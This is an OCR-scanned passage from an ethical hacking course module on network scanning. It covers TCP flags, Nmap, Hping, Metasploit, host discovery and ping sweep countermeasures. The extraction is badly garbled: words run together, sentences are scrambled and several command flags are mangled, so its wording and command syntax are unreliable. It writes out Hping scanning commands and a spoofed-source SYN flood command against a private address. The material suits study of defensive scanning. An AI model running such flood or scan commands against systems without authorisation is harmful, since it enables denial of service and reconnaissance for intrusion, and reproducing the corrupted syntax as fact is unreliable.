a network'ssecurity and,consequently,for gaining unauthorizedaccess to
it
Someobjectives
for scanninga networkare as follows:
Discover

network's
the
hosts,
addresses,
ports
openports,the attacker thehosts.
live IP andopen of
will determinethe bestmeansof entering
live Using
into the system,
the

Discover
‘An the
OS
and ofthe
target.
This
system architecture
attackerc an formulatean attackstrategy
is alsoknownasfingerprinting,
basedon theOS'svulnerabilities.
Discover the services running/listening on the targetsystem. Doing so givestheattacker
a n indication
that
of thevulnerabilities(based
accessto the targetsystem,
on the service) can be exploited for gaining

Identify
specific
applications or versions ofa particular
service.
Identify
vulnerabilities
i n any of the network systems. Thishelps
a n attacker
to
or networkthrough
the targetsystem
compromise various exploits.

03
Module Page240 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 TCPCommunicationFlags

ea

Wo
Acsowiesgement

| ost,

TCPCommunicationFlags
TheTCPheadercontains various flagsthat control the transmission of data across a TCP
connection.SixTCPcontrolflags managetheconnection between hostsand giveinstructionsto
the system. Fourof theseflags (SYN, ACK, FIN,
andRST) governthe establishment, maintenance,
andtermination of a connection.Theother two flags
system. Thesize of
each
section is 6 bits.Whena flag
(PSH
flagis 1bit. Asthereare six flags
that flag
valueis set to “1,―
andURG)
i n theTCPFlags
is automatically
section, tothe
provideinstructions
the size of this
turn:ed on.

co noe
II wow

Options
i 031 Bits —>
12:TCP
Figure
headerformat

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TePFlags
Figure3.3:
TCPcommuniaton fags

Thefollowing
are the TCP flags:
communication
Synchronize It notifiesthe transmissionof a new sequencenumber.Thisflag
or “SYN―:
generally the establishment
represents of a connection (three-way
handshake)
between
two hosts.
‘Acknowledgement or “ACK―:
It confirmsthe receipt of the transmissionandidentifiesthe
next expected sequence number. Whenthe system successfully receives a packet, it sets
thevalueof its flagto “1,―
thusimplying thatthe receiver shouldpay attention to it.
Whenit is set to “,―
Pushor “PSH―: it indicatesthat the senderhasraisedthe push
to the receiver; thisimplies
operation thatthe remote system shouldinformthe receiving
application
aboutthe buffereddatacoming fromthe sender.Thesystem raises the PSH

atstart
flag the
buffer of
data
transfer
deadlocks. sets
andend
of
segment
afile and it on the last to prevent

Urgent or “URG―: packets

It instructsthe system
to processthedatacontainedi n as soon

the to
as possible,
Whenflag systemsetsthe
datafirstandall theotherdataprocessing
“1,― theurgent
priorityi sgivento processing
is stopped.

Finish
to
or “FIN―:
remote system sent
Itis set "―to announce thatno more transmissionswill be
andthe connection establishedbytheSYNflagis terminated
to the

or When
thereerror connection,
Reset “RST―:
this
flag
is an
flag
in the current
theconnection is abortedi n responseto theerror. Attackers
andidentifyopen ports.
use this
is set to “1―
and
to scan hosts

gathering flags:
SYNscanningmainly
information
illegal these
dealswith three
three
flags
SYN,ACK,
fromservers during
andRST.You can use
enumeration.
for

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TCP/IPCommunication

‘TCP
Session
E stablishment

@ a

‘TCP/IP
Communication
TCPis connection oriented, connection establishment
ie., it prioritizes beforedata transfer
betweenapplications.Thisconnection betweenprotocols through
is possible the three-way
handshake.
initiatesusing
ATCP session a three-way
handshakemechanism:
=
To launcha TCPconnection,the source (10.0.0.2:21)
sendsa SYN packet
to the
destination(10.0.0.3:21),
(Onreceivingthe SYNpacket, bysending
thedestinationresponds a SYN/ACK
packet
back
tothesource.
TheACKpacket
confirmsthe arrivalof thefirstSYNpacket
to the source.
Finally,
the source sendsan ACKpacket
for the ACK/SYN
packet
transmittedbythe
destination.
an "OPEN"
Thistriggers
anddestination,
thereby
connection,
whichcontinues until
theconnection,
allowing
communication
one of themissues a
betweenthe source
"FIN"or "RST"packet
to close

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
34: TCPsession establishment

The TCP protocol maintains stateful connections for all connection-orientedprotocols

the
throughoutInternetandworkssimilarly
picks
up a telephone
to
ordinary inwhich
one
telephone communication,
receiver,hearsa dial tone, anddialsa numberthat triggers
ringingat the
other
enduntilsomeone picks
and
upthe receiver says,“Hello.―
Thesystemterminates theestablished TCPsessionas follows:
After completing allthedatatransfersthrough theestablished TCPconnection, thesendersends
the connection termination request to the receiver through a FIN or RSTpacket. Upon receiving
the connection termination request, the receiver acknowledges the termination requestby
sending a n ACK packet to the senderandfinally sendsits own FIN packet. Then, the system
terminates the established connection.

oF
tes

35:TCP
Figure termination
session

ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow

PortandServiceDiscovery

Tools FD
Seanning osciscvery
Gamercrating?
‘onringerpinting

Scanning
Beyond
IDSandFirewall

Scanning
Tools:Nmap

=
ae

ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
Scanning
Tools:Hping2/Hping3

05 guessing,
TCP/IP
sung.
teeanbeusedfor pathMTUdiscovery,
‘manval advancestraceroute,
remote fingerprinting,
remoteuptime stacks ee

HpingCommands

il an Countermeasures
Macking oy recounet
 Scanning
Tools CEH

Tools
Scanning
toolsare usedto scan andidentify
Scanning livehosts,openports,runningserviceson a target
network,
locationinfo,NetBIOS info,andinformationaboutall TCP/IP
and UDPopen ports.The
obtainedfromthesetoolswill help
information an ethical
hacker the profile
i n creating ofthe
target
+
Nmap
the
andscanningnetworkfor open portsof the devicesconnected.
organization

Source:https://nmap.org
Nmap("Network Mapper") is a securityscanner fornetworkexploration and hacking.
It
allowsyou to discoverhosts, ports,andservices o n a computer network,
thuscreatinga
"map" of the network.It sendsspecially craftedpackets to the targethostand then

analyzes
of to
the responses
ofthousands machines.
UDP),OSdetection,
accomplish
Nmap
its goal.
includes
forof
it scans vast networks literallyhundreds
manymechanisms portscanning(TCP
version detection,ping sweeps,andso on.
and

Eithera networkadministratoror an attackercan use thistool for their specific needs.

Networkadministrators can use Nmap fornetworkinventory, managing service upgrade
schedules,and monitoring host or service uptime.Attackersuse Nmapto extract
information
version),
typeof packet on
suchaslive hosts thenetwork,
filters/firewalls,
openports,services (application
MACdetails,andOSsalong
name and
with their versions.
Syntax:
# nmap <options> <Target IP address>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 36:Sereenshotlaplaying
Figure Nmap scan

03
Module 248
Page tical andCountermensores
Making Copyright©
by Comet
 <a)

Obtains
list|S
-
of a
somncague)
3s

(oorkgrovp!
ports,OS
‘open

details, MAC
and
details,
+ lerosatt HITPWPE ht

services
along
with their Minoo
oe
versions resort
Windows RAC

Hping2/Hping3-
37: Screenshot
Figure
sispayingNmap
scan result

Source:http://www. hping.org
Hping2/Hping3
the TCP/IP
is a command-line-oriented
protocol
raw-lP protocols.
networkscanning
that sendsICMPechorequests
It performs network security
andpacket
and supports
auditing,
TCP,UDP,
firewall testing,
crafting
toolfor
ICMP, and
manualpath
MTUdiscovery, advanced traceroute,remote OSfingerprinting, remote uptimeguessing,
TCP/IP
target auditing,
stacks
replies
similarly
well as arbitrary
packet
andotherfunctions.i t can sendcustomTCP/IP
to a pingprogramwith ICMPreplies.
body
packets
It handles
and size,and it can beusedto transferencapsulated
anddisplay
fragmentation as
files
underthe supported protocols.It alsosupports idle host scanning.IP spoofing and
network/host scanning can be used to perform a n anonymous probe for services.
Hping2/Hping3 alsohasa Traceroutemode,whichenablesattackersto send files
betweencovert channels.It alsodetermineswhetherthe hostis up even whenthe host

ical andCountermensores
Mackin ©by E-Comel
Copyright
blocksICMPpackets. Its firewalk-like
usageallowsthe discovery
of open portsbehind
firewalls.It performsmanualpathMTU discovery and enablesattackersto perform
remote
Using
OSfingerprinting,
Hping,
attacker
an
behavior
of ports
host
can study
gain
the
aboutan idle and information
target,
the
as services
such the
that
host
offers,
supporting
the
services,the
the OSof the target.Thistypeof scan is a predecessor
outright
attacks.
the and
to either heavierprobingor

Syntax:# hping <options> <Target IP address>

ICMPScanning
ping sweep or Internet ControlMessage
‘A Protocol(ICMP)
scanning is a process of
sending or pingto all the hostson thenetwork
an ICMPrequest to determine
the ones
that
are
up.

icp
2
scmp

0
hping statistic
ransmitted, 9 packetsre
ip min/avg/nax
= 2.2/5.2/9.1

TheOS,router,switch,
andIP-based
Figure3.8:
devices
MPscanning
u se thisprotocolvia the pingcommandfor
echorequest
andechoresponseasa connectivitytester betweendifferenthosts,
ACKScanning
on Port 80

This
scanning
Simple
packet
technique
filtering
can beusedto probe
the existence firewall
allowsthe establishmentof a connection (packets of
a andsets.
with the
its rule

whereasa sophisticated
ACKbitset),
a connection.
statefulfirewalldoesnot
allow
theestablishmentof

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ee

#bpings -A 10,10.10,10 —p

09
HerneT0,10,10,10 tethO 10,10.10,10): A set, 40 headers + 0 dat
ip=10,10,10.10ttl=128DF id=46786 sport=80
flagseR seq te
U
ip=10,10.10.10ttl=128 DF id=46787 flagseRseq
sport=80 ret
ip=10,10.10.10 . ttl=128
DF id=46788 flags«R
sport=80 seqe2 rtt
ip=10,10,10.10 v ttl=128
DF id=46789 flagseRseq
sport=80 ret
ip=10,10,10.10tU ttl=128
DF id=46790 flagseRseq:
sport=80 rtt
ip=10,10.10.10tU ttl=128
DF id=46791 flagseRseq
sport=80 0 rtt
ip=10,10.10.10 . 128DF id=46792 flagseRseq
sport=80 0 rtt
ip=10.10.10.10 . 128OF id=46793
ip=10,10,10.10 v 128OF id=46794
flags«R
sport=80 seq=7
flagseRseq}
sport=80 wine0 rtt
0 rtt=8.4

10,10.10,10 hping statist

kets transmitted, 9 packets packet
=
rece

und-trip min/avg/max 2.0/5.1/8.4

HpingCommands
3.9:
Figure ACKseanringon port80

Thevarious Hping
commands
are as follows:
© ICMPping
& hping3-1 10.0.0.25
Hping
You performs
may
an
ICMP
hping or
byspecifying
pingscan
argument
inthe
argument
use --ICMP -1
the as-1.inthe
line.
the
command
thecommand
line. Byissuing above

utility. to
reply
‘command,sendsa n ICMPechorequest 10.0.0.25andreceives an ICMP

ACKscan
ping
similarly
to a
on port80
Ex. hping3 -A 10.0.0.25 -p 80
Hpingcan be configured to perform an ACKscanbyspecifying the argument -A in the
‘command
line. Here, you set the ACKflag i n the probepackets andperform the scan.
Youperform thisscan whena hostdoesnot respond to a pingrequest. Byissuingthis
‘command,
Hping checksif a hostis alive on a network.If it findsa live hostand an
port,it returns an RSTresponse.
‘open
UDPscanon port
80
Ex. hping3-2 10.0.0.25 -p 80
uses TCPas its default protocol.
Hping the argument-2 i n the commandline
Using
specifies
that Hpingoperatesin theUDPmode.Youmayuse either ~udp or -2 as the
i n the command
argument line.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Byissuingthe abovecommand, HpingsendsUDPpacketsto port80 on the host
(10.0.0.25).
It returns an ICMPportunreachable
doesnot return a message ifit
message findsthe portclosedand
if the portis open.
InitialSequence
Collecting Number
Ex. hping3192.168.1.103 -9 -p 139 -s
Usingthe argument -Qi n the commandline,Hping
collectsall the TCP sequence
numbersgenerated bythe targethost(192.168.1.103).
FirewallsandTimestamps
Ex. hping3-S 72.14.207.99
-p 80 --tep-timestamp
f
Many drop
irewalls thoseTCP thatdo not havetheTCPTimestamp
packets option
set.Byadding
‘TCP
the
timestamp ~tcp-timestamp
optioni nargument
to command
line,
Hping the
frequency
in the
andtry guessthetimestamp
Uptimeof the targethost(72.14.207.99).
update
you can enable
and

SYNscan on port50-60
Ex. hping3-@ 50-60 -s 10.0.0.25 -v

the
Using argument -8 or ~scan in thecommandline,you are operating in the
Hping
host.Adding
scan modeto scan a rangeof portson the target the argument
-Sallows
perform
youto a SYNscan

Therefore,
the abovecommandperforms
a SYNscan on ports50-60 on the target
host.
FIN,PUSHandURGscanon port80
Ex, hping3 -F -P -U 10.0.0.25 -p 80
Byadding the arguments f, -P,and-U i n the commandline,you are settingFIN,
PUSH, andURGpackets i n the probepackets. Byissuingthis command, you are
performing
FIN,
PUSH,
and
scans
port
If80
on
the
target
host
(10.0.0.25)
URG on
is open,you will not receive a response.the portis closed,
‘80
RSTresponse,
If port
will return an
Hping

Scanentiresubnetfor livehost
Ex. hping3-1 10.0.1." --rand-dest -r etho
Byissuingthis command,Hpingperformsan ICMPping scan on the entire subnet
10.0.1.x;
in otherwords,
it sendsan ICMPechorequestrandomly (--rand-dest)
to all
thehostsfrom10.0.1.0 to 10.0.1.255that are connected
to theinterface
eth0.The
hostswhoseports
seta are
port;hence,open
will ICMP
reply.
case,
not
respond
with an Inthis
bydefault.
to port 0 on all IP addresses
sendspackets
Hping
youhave

ical andCountermensores
Mackin ©by E-Comel
Copyright
 alltrafficcontaining
Intercept HTTPsignature
Ex.hping3 -9 HTTP -r etho
‘The
argument
9 HTTP, Hping to
starts listening the
-9will set the Hpingthelistenmode.Hence, byissuing command
on port0 (ofall the devicesconnected
i n the network
to interfaceeth0),
fromthesignature
intercepts
end the
topacket's
end. the
HTTP containing signature,
allthe packets anddumps

Forexample,
hping2
on issuingthecommand -9 HTTP,if Hpingreadsa packet
it will display
contains data 234-09sd#1k}s45-HTTPhe11o_world,
that
the resultas
hello_world.
SYNflooding
a vi

&&.hping3-S 192.168.1.1 -a 192.168.1.254 -p 22 --flood

TCPSYNflooding
Theattackeremploys usingspoofed
techniques IP addresses
to
perform
a

Thefollowing
DoS
attack.
tableliststhe various scanningmethodsandtheir respective
Hping
commands:
Scan Commands

IMP ping hping3 -1 10.0.0.25

ACK 80
scanon port hping3 -A 10.0.0.25 =p 80

UDP 80 |
scanon port

Collecting
initial
hping3-2 10.0.0.25
number hping3192.168.1.103
sequence
-p 80
-9 -p 139 -s

Firewallsandtimestamps hping3 -S 72.14.207.99 -p 80 --tep-

timestamp

porton
SYNscanon
FIN,PUSH,
port
|
50-60
andURGscan 80
hping3-8
hping3-F
50-56 -s 10.0.0.25
-P -u 10.0.0.25
-v

-p 80

entire
Scan
subnet for livehost
alltrafficcontaining
Intercept HTTP
hping3 -1
hping3 -9
10.0.1.x

HTTP -1 etho
--rand-dest -I ethO

signature

a
SYNfloodingvictim hping3 -S 192.168.1.1
wep Bleed
-a 192.168.1.254

Table 3.1: c ommand

Hping andits
respective
funetion

ical andCountermensores
Mackin ©by E-Comel
Copyright
Metasploit
Source:https://www.metasploit.com
Metasploit that provides
is an open-source project the infrastructure,
content, andtools,
perform
to penetration auditing.
t ests andextensive security It provides
information
about securityvulnerabilitiesand aids i n penetration testingand IDS signature
development. It facilitates exploits
thetasksofattackers, writers,andpayload writers. A
major advantage of the frameworkis the modular approach, i.e., allowing the
combination of anyexploitwithanypayload,
It enables you to automate the process of discoveryandexploitation andprovides you
with the
necessary
tools manual
can use Metasploit of to performthe testing phase a penetration
Proto scan foropenportsandservices,exploit
test. You
vulnerabilities,pivot
of
further into a network,collectevidence, andcreate a report the test results.

3.10:Screenshot
Figure
various
Metasploit
displaying portsean modules

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NetScanTools
Pro
Source:https://www.netscantools.com
NetScanTools tool that allowsyou to troubleshoot,
Pro is an investigation monitor,
discover,anddetectdevices o n your network. Using thistool, you can easilygather
informationaboutthe localLANas well as Internetusers,IPaddresses, ports,andso on.
‘Attackers
can findvulnerabilities
andexposed portsi n the targetsystem. It helpsthe
attackersto list IPv4/IPV6addresses,
hostnames, domainnames, emailaddresses, and
URLsautomatically or manually (using
manual tools).NetScanTools Procombines many
networktoolsandutilities categorized bytheir functions,suchas active,passive,DNS,
andlocalcomputer.

hog tie

oe
@ hg SanneRespnee
Summary

Made
PromieuousSenne

Nestea
Bs
3.11:Screenshot
Figure ofNetScanToos
Pro
Someadditionalscanningtoolsare listedbelow:
=
Unicornscan (https://sourceforge.net)
+
SolarWinds (https://www.solarwinds.com)
PortScanner
NetworkMonitor (https://www.
‘PRTG paessler.com)
=
OmniPeek (https://www.savvius.com)
NetworkProtocolAnalyzer

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools for Mobile
Scanning
IP Scanner

Tools for Mobile

Scanning
=
IPScanner
https://10base-t.com
Source:

along
for
IPScanner iOSscansyour localarea network to determinetheidentity
andInternet devices.It allowsattackersto perform
machines
withpingandportscans.
of
all its active
networkscanningactivities

ical andCountermensores
Mackin ©by E-Comel
Copyright
Fing
Source:https://www.fing.io
Fingis a mobileapp for Androidand iOSthat scans and provides complete network
suchas IP address,
information, MACaddress, device andISPlocation.
vendor, It allows

addressto all
devices
attackers discover

as
well
to perform
connectedto a Wi-Finetworkalong
as the name of thevendor/device manufacturer.
networkpinging andtraceroute activities through
withtheir IPandMAC
It alsoallowsattackers
specificportssuchas SSH,
FTP,
NetBIOS,
ete.

Figure3:13:
Screenshot
of Fing

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
NetworkScanner
Source:https://play.google.com
NetworkScanneris an Androidmobileapplication that allowsattackersto identify
the
activehosti n therangeof possible
addressesin a network. It alsodisplays
IPaddresses,
MACaddresses,
host
names,
vendor
details
allavailable
and
Thistool alsoallowsattackers devices
network. of the
to portscantargets withspecific
i n the
portnumbers.

NetworkScan.
1p:192.168.1.102/24
SSi0:"Tenda_
26508"
MODE:
(72
WiFi Mbps)
402..168.192 Coro)

Bea
(Catenay)
netanteway

1003.168.192.
192.1681.100

109..168.192.
192.1681.109

101..168.192.
392.1681.101

3.14:Screenshot
Figure ofNetwork
Scanner

Module
03 258
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 Module Flow

Host Discovery
is the process
Scanning information
of gathering about systems thatare “alive―
andresponding
on the
network.
Host
To performdiscovery
considered
asprimary
a complete network
scanning
is
process.
scanandidentify
the taski n the
openportsandservices,itis necessaryto check forlive
Host
systems.
discovery
an attacker an status
of
the
systems
network,
providesaccurate
to avoidscanningeveryporton everysystem
whetherthe targethostis up.
i n the whichenables
i n a sea of IP addressesto identify

Host discovery is the first step

i n networkscanning. Thissection highlights
howto checkfor live
systems in a networkusingvarious pingscan techniques. It alsodiscusses
how to pingsweepa
networkto detectlive hosts/systems alongwith various pingsweep tools,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HostDiscovery
Techniques
(©Host
discovery
ate t o identify
techniques used theactive/Ive i n thenetwork
systems

Host Discovery
Techniques
Hostdiscovery
techniques can be adopted
to discoverthe active/live
hostsi n the network.Asan
ethicalhacker,
you must beaware ofthe various typesofhostdiscoverytechniques. Somehost
discovery
techniques
are listedbelow:
+
ARPPing
Scan
+

+
Ping
UDP
ICMPPing
scan
Scan
©
Ping
ICMPECHO

Ping
+ ICMPECHOSweep
©

©
Ping
ICMPTimestamp

Mask
Ping
ICMPAddress

TCP PingScan
Ping
TCPSYN
© TCPACKPing
IPProtocolSean

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ARP Ping
Scanand UDP Ping
Scan

ARP PingScanand UDP PingScan

ARP PingScan
In the ARPpingscan,the ARPpackets are sent for discoveringall active devicesi n the IPv4 range
even though the presenceof suchdevicesis hiddenbyrestrictive firewalls.In most networks,
manyIP addresses
LAN.Hence,
host,
are unusedat
whenthe attackers any
giventime,specifically
try
to
send IPpackets
i n the private addressrangesof the
suchas ICMPechorequest
the OSmust determinethehardwaredestinationaddress (ARP) corresponding
to the target
to the target
IP for addressing the ethernetframecorrectly. Forthis purpose,a series of ARPrequests a re
issued,ARPscan is usedto showthe MACaddressof the networkinterfaceon the device, andit
can alsoshowthe MAC
hostIPwiththe respective
generated
of
all the
addresses devicessharing same
hardwaredestinationaddressis active,
bythe host;otherwise, aftera certain number
IPv4address
on
the
LAN.
thentheARPresponsewill be
of pingattempts, theoriginal
Ifthe
OSgives
Up o n the host.In other words,whenattackerssendARPrequest probes to the targethost, if
theyreceive anyARPresponse,thenthehostis active. In casethedestinationhostis foundto be
Unresponsive, the source hostaddsan incomplete entryto the destinationIP i n its kernelARP
table.
Attackers
use the Nmaptoolto perform ARPpingscanfordiscovering
livehostsi n thenetwork.
In Zenmap,
scan.
the -PR optionis usedto perform
ARPping

scan,todisable
the
port
scan.you
ping
as,
Note: ~sn the Nmap
is command Since Nmapuses ARP scan
thedefault ping
disable-arp-ping, other
to disableit andperform desired
pingscans, can use ~~

ical andCountermensores
Mackin ©by E-Comel
Copyright
 probe
ARPrequest

=<
Attacker 3.5:
Figure ARPpingscan
Target

Advantages:
‘=
ARPpingscanis considered
to bemore efficient
andaccuratethanotherhostdiscovery
techniques
pingscan automatically
‘ARP
discretion
handlesARPrequests,
retransmission,timeout
and at its own

discovery,
ARPpingscanis usefulfor system whereyoumayneedto scan large
address
spaces
pingscancan display
‘ARP theresponsetime or latency
ofa deviceto an ARPpacket

Teer {10103030

[Trem] Series}
snap Hox
Our Pets/ Host Topo Oth Scam

UDPPing
s can
Figure
3.16:ARPsean in Zenmap

UDP ping scan is similarto TCP ping scan; however,

i n the UDP ping scan, NmapsendsUDP
packetsto the targethost.The defaultportnumberusedbyNmap for the UDPping scan is
40,125.
Thishighly uncommon portis usedas thedefaultfor sendingUDPpackets to the target.
Thisdefaultportnumberc an be configured
compile time in Nmap.
usingDEFAULT_UDP_PROBE_PORT_SPEC
during
packets
AttackerssendUDP to the targethost,
anda UDPresponse m eansthat the targethostis.
active, Ifthe targethostis offline or unreachable,
various error messages suchas host/network
unreachable or TTL exceeded couldbereturned.In Zenmap, the -PU option is usedto perform
the
UDP pingscan.

03
Module Page262 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 & tracker
Figure3.27:
uorping

Hostis Active

UDPpingsean to determine
Target
ifthe hostsactive

LS
>
ap ee Host is inactive
Attacker
Figure3.18
UDPpingcanta determinethehosting
Target

‘Advantages
=
UDPpingscans havethe advantageof detecting behindfirewallswith strict TCP
systems
filtering,
leaving
the UDPtrafficforgotten.

©
Zenmap
ScanTools Profle Help
Target:
|
Command:[remap
1010:1010
an PU10101010

5 +
Hess]
Host
Sevices
=
| NewpOvput Pore/Hoss Topelogy
10.101
[rmap-2n-PU
HortDetails
Scant
etait
® rara1010 Starting ap 7
we 2019-06-07

Figure3.29:
UDP
in
pingsean Zenmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ICMPECHOPing
Scan
|

|
scans
return
reply
1cmP€oH0
wil
ping
an ICMP

TWsscan
vole sending
ECHO
seal for locating
ICMPECHOrequests

active devices
toa hos. the host ve,

iftheICMP
or determining s passing
through

ICMPECHOPing
Scan
use the ICMPping scan to sendICMPpackets
‘Attackers to the destinationsystemto gatherall
necessary informationaboutit. Thisis becauseICMPdoesnot include andit is
portabstraction,
differentfrom portscanning.However, itis usefulto determinewhat hostsi n a network are
runningbypingingthemall

ping
ICMPECHO scaninvolves
return a n ICMPECHO
is passing through
reply.
sendingICMPECHO
Thisscan is usefulfor locating
a firewall,
to a host.If thehostis alive,i t will
requests
active devices or determiningif ICMP

HEMPEchoRequest,

Â¥
source
—
—

(20.10.10.16)
1EMPEchoReply }
Destination
(10.10.10.10)

UNIX/Linux andBSD-basedmachines
320:1eMP
Figure
and echo

use ICMPechoscanning;
request
the TCP/IP
eply

stackimplementations
intheseOSsrespondto the ICMPechorequests to the broadcast Thistechnique
addresses. does
not worko n Windows-based networks,
as their TCP/IP stackimplementationdoesnot reply
to
ICMPprobes
directed
at the broadcast
address.
Nmap
u sesthe -P option
to ICMPscan the target.
Theusercan alsoincreasethenumberof pings
in parallel
usingthe~ option.It mayalsobeusefulto tweakthepingtimeout valueusingthe ~

option.

ical andCountermensores
Mackin ©by E-Comel
Copyright
InZenmap,the -PE optionis usedto perform
the ICMPECHOping scan, Active hostsare
displayed
as “Host up,"as showni n thescreenshot.
is

ScanTools Profle Help

map -an PE3010100

Sewices
| Nmap Outpt Por
etait
® rar01010 "
at 2019-06-07

fmaa_danei1 TPsdzre:
Fer Monte

Figure
3.21
Echo
ovtpu
ICMP png scan

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ICMP ECHO Ping
Sweep
1 Pngsweep used
the
hot
todetermine ve froma rangeof addees
by

oa
ssiLD
seach
ICMPECHOPingSweep
A ping sweep (also knownas an ICMPsweep) is a basicnetwork scanning technique that is
adopted to determine therangeof IP addressesthat mapto live hosts(computers). Although a
single ping will tell the user whethera specified hostcomputer existson the network, a ping
sweepconsistsof ICMPECHO requestssent to multiplehosts.Ifa specifiedhosti s active,it will
return a n ICMPECHO reply.
Pingsweeps are amongthe oldestandslowestmethodsusedto scan a network.Thisutilityis
distributed
on
all platforms,
acrossnearly
the networkanswers the ping query that anothersystem a
andit actsas rollcal forsystems; thatis active
a system
sendsout.
ICMP echoscanningpingsall the machines i n the target
network to discoverlive machines.
AttackerssendICMPprobes to the broadcast or networkaddress,
whichrelays to all the host
addresses will sendthe ICMPechoreply
i n the subnet.Thelive systems message to the source
ofthe ICMPechoprobe.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 cho Request

ICMPEchoRequest

Â¥ ICMPEchoReply 10.10.09

Source
1010.10.16
ICMPEcho
Request
>
10.10.10.12
ICMPEchoReply

ichaP
Request
Echo
10.10.10.10

ECHO Figure3.22:
CMP PingSweep
Tounderstandpingsbetter,o ne shouldbeableto understandthe TCP/IP packet. Whena system
pings,it sendsa single packetacross thenetworkto a specific IPaddress. Thispacket contains64

(56 and
8 header
information).
bytes databytes bytes
for a return packet
is “alive,―
a good
sender
or ofprotocol
fromthe target
return packet
The
system.If the connectionsare good
is expected. However,
thenwaits listens
andthe targetcomputer
thiswill not be the case if there is a
disruption i n communication. Pings alsodetailthe time takenfor a packet to makea complete

calledtime.―
trip,
They
help this
case,
the “round-trip also
bouncesbackwhensent to the IP address,
unableto reconcilethename with thespecific
in resolving
hostnames. In if the packet
but not whensent to the name, thenthe systemis
IPaddress.
‘Attackers to identify
calculatesubnetmasksusingsubnetmaskcalculators the numberof hosts
that are present i n the subnet.They
subsequently
use pingsweep to create an inventoryof live
systems in thesubnet,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Ping
ICMPECHO Sweep
Using
Nmap
Source:https://nmap.org
Nmap helpsa n attackerto perform
In Zenmap,
addresses.
a ping sweep that determines livehostsfrom a range IP
is usedto perform
the -PE optionwitha list of IP addresses ICMPECHO of
ping
sweep. ©
Zenmap
Scan TooleProfile Help

Target/10:10:05-15
Command:[pmapan PE1010105-15

Hots

Host
| Senices
Nmap
OutputHost
reap
Details
an
§
PE10.10.1055
Topology
Ports/Hosts
]
Scans
(Dei
010105 i ( netps://omap.org) at 2019-06-18
‘®
10.10.109

IEE
ean _ceport for 10.10.10.5
8
ee. cman
Besnaemn-nevere
o

® 10101011 $0.50.50.9 for

Gert
fevie.ceer
Grint tas
3 cney)
(09:00!29:79:02:89 (Vimare)

Nespdone: I IP sadcesses (4 hosts up) scanned in

FiterHoas

Fgure323:PingSweep
output usingZenmap

03
Module 268
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools
PingSweep
IP| Angry?
Angry
Scanner
Seanner pings
each
IPto
@
resolves
‘optionally
addres checkanyofthese
hostnames,
determines
a ddrstes
theMACaddress, are
ve
et.
sans ports,
Then,it

PingSweep
Tools

Tools
PingSweep
Ping
sweep toolsping an entire range of networkIPaddresses
to identify
the live systems.
The
following
are pingsweeptoolsthatenable livehostson thetargetnetworkby
one to determine
sending
multiple
ICMPECHO to various hostso n the networkat a time.
requests
=
Angry
IPScanner
Source:https://www.angryip.org

‘as
well
any
of
their
as and
IP scanner is an IPaddress portscanner. It can scan IPaddresses
‘Angry
ports. address
check
if alive;
resolvesi ts hostname, then,
optionally
It pings eachIP
determines the MACaddress,
to tis
i n anyrange
it
scansports,andso on. Theamount

of host
datagathered
features,
logged
with
abouteach increases
(computer
suchas NetBIOSinformation
i n Windowsuser),
plugins.Angry IPscanner hasadditional
name, workgroup name, andcurrently
favorite IP addressranges,web server detection, and
customizable openers. Thetool allowsthe user to save the scanning resultsto CSV,
TXT,
XML,or IP-Portlist files.To increase the scanningspeed, it uses a multithreaded
approach: a separatescanning
thread is createdfor eachscanned IP address.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
3.24:
of Scanner IP
Screnshot Angry lvehots
showing

DROSS USER RRS aS

Figure3.25: of Angry
Screenshot IPScanner showing details
complete of ive hosts
Someadditionalping sweep toolsthat an attackeruses to determinelivehostson the target
networkare listedbelow:
‘=
SolarWinds Toolset(https://www.solarwinds.com)
Engineer's
=
Pro(https://www.netscantools.com)
NetScanTools
Colasoft PingTool(https://www.colasoft.com)
Tester (http://www.pingtester.net)
VisualPing
Oputils
(https://www.manageengine.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Countermeasures
PingSweep

sempre

arfly valute thetypeofIMP trate flwngthrougenterprise

networks

‘Umit
Acces
Contr
eM
(ACLsonl
fspeci
wri ung
such
as
SPs Lsts ermislan
anderen adresces

Countermeasures
PingSweep
Somecountermeasuresfor avoiding
ping sweep are as follows:
+
Configure
thefirewallto detectandpreventpingsweep attemptsinstantaneously
Use intrusion detectionsystemsand intrusion prevention
systemssuch as Snort
(https://wwwsnort.org)
to detectandprevent
pingsweepattempts
Carefully
evaluatethe typeof ICMPtrafficflowing
through
the enterprise
networks
Terminate the connection with any hostthat is performing
more than 10 ICMP ECHO
requests
UseDIZ andallowonly
commands
andTIME. EXCEEDEDin DMZZone
suchas ICMP
ECHO_REPLY, HOST UNREACHABLE,

ControlLists(ACLs)
LimittheICMPtrafficwithAccess to your ISP'sspecific
IPaddresses

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Other Host Discovery
Techniques

Other Host Discovery

Techniques
ICMPTimestamp
Ping
Scan
Besides thetraditionalICMPECHOping,there are some othertypesof ICMPpingingtechniques
sucha s ICMPtimestamp
i n specific
conditions.
pingscanandICMPaddress
can
maskpingscan,whichan attacker adopt

ICMPtimestamp ping is an optionalandadditional typeof ICMPpingwhereby theattackers

query a timestamp message to acquirethe informationrelatedto the current time fromthe
targethostmachine.Thetargetmachineresponds with a timestampreply to eachtimestamp
query that is received.However, the responsefromthe destinationhostis conditional, and it

ICMP is on
mayor maynot respond withthe time valuedepending its configuration
bythe administrator
target's
at the

specifically
used
for
